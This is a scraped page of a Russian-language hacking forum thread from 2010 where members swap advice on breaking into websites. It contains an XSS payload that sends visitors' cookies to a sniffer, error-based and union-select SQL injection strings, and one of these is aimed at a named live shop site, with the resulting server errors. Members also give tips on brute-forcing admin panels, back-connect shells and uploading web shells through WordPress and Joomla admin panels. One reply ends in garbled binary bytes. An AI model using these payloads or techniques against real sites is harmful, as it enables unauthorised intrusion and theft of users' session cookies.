Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    только это нарыл..http://www.securitylab.ru/vulnerability/199904.php
    а так заливай шелл и три хтацес..
     
  2. youger

    youger New Member

    Joined:
    3 May 2010
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    нет не какого доступа на сервер :(
    админка так защищена.
     
  3. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    я еще не слышал об обходе такого
    ПС
    БрутЬ, брутЬ и еще раз ЬрутЪ
     
  4. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Подскажите пожалуйста.
    На сайте при вводе вместо логина <script>alert()</script> выскакивает табличка. я так понял это xss. Покурили маны малеха ну так и не допёр. модифицирую запрос до
    <sсriрt>img = new Image(); img.src = "путь до снифа?"+document.cookie;</sсriрt>

    вставляю в то же поля и ничего не выскакивает. в чем прикол?
     
  5. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Прикол в том, что ничего и не выскочит, но куки отправятся на сниффер.
     
  6. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Спасибо. буду разбираться. у меня сниф делюкс и мильти каника, что то не ловит куки.
     
  7. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Что может мешать сделать бекконект ?Система freebsd 7.2.
    Спасибо
     
  8. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Может быть тот порт занят через который ты бэкконнект делаешь.
     
  9. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    сорь, я неправильно поставил вопрос.
    Что мешает забиндить порт?
     
  10. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Подскажите, как правильно составить запрос?

    form.php?pageid=93'+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+TABLE_NAME+from+INFORMATION_SCHEMA.COLUMNS+where+column_name+like+0x257025),1,64),floor(rand(0)*2)))z)+--+
     
  11. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    Hi Team;

    http://www.ibuycc.com.cn/product.php?id=77'

    этого сайта SQL ошибка. Я пытался использовать "union select" до 50, но не результатом
    Можем ли мы "inject" этот сайт? :confused:
     
  12. youger

    youger New Member

    Joined:
    3 May 2010
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    есть готовый брут под этот случай?
     
  13. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Code:
    http://www.ibuycc.com.cn/product.php?id=-77+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
    хватит спрашивать одно и тоже. читай статьи и всё будет ясно


    так видно? О_о

    Code:
    http://www.ibuycc.com.cn/product.php?id=-77+union+select+1,2,3,4,version(),version(),7,version(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
     
    #13413 .:[melkiy]:., 5 Jun 2010
    Last edited: 5 Jun 2010
    1 person likes this.
  14. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1

    Благодарю за ответ, но не отображать версии


    Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/ibuyccco/public_html/product.php on line 295

    Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 182

    Warning: Cannot modify header information - headers already sent by (output started at /home/ibuyccco/public_html/product.php:27) in /home/ibuyccco/public_html/includes/lib.function.php on line 192
    ‹�����xÚí}ëwG¶ïçËZùú(k]
     
    #13414 haito, 5 Jun 2010
    Last edited: 5 Jun 2010
  15. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Убери пробелы...
     
  16. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Попробуй этот: https://forum.antichat.ru/thread109600.html
     
  17. Anarh1st

    Anarh1st Member

    Joined:
    19 May 2010
    Messages:
    32
    Likes Received:
    5
    Reputations:
    0
    Как залить шелл имея доступ к админке wp?
     
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Anarh1st
    неужели так трудно набрать в поиске нужные слова?

    https://forum.antichat.ru/showpost.php?p=770176&postcount=3
     
  19. Anarh1st

    Anarh1st Member

    Joined:
    19 May 2010
    Messages:
    32
    Likes Received:
    5
    Reputations:
    0
    Извиняюсь =[
    Cпасибо
     
  20. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Подскажите, как залить шелл имея доступ к админке на joomla?
    В Global Configuration разрешаю загрузку php, но когда захожу в Media Manager , то при загрузке шелла (в *.php) пишет: "Not a valid image." Как решить проблему? И как залить шелл другим способом?
     
Thread Status:
Not open for further replies.